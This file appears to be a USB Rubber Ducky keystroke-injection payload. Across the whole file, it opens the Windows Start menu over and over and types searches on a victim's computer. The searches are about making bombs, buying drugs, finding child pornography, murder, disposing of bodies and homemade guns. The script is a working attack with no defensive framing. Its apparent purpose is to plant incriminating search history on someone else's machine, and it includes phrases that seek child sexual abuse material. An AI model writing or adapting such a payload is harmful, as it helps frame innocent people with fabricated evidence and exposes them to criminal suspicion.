DELAY 500
CTRL ESC
STRING how to make a bomb
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING how to buy drugs
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING child pornography online
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING watch child porn
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING i want to kill someone
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING how to murder someone
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING how to hide a body
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING how to dispose of a corpse
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING how to make a homemade gun
DELAY 250
ENTER
DELAY 500
CTRL ESC
DELAY 250
STRING how to hide a gun
DELAY 250
ENTER
DELAY 500
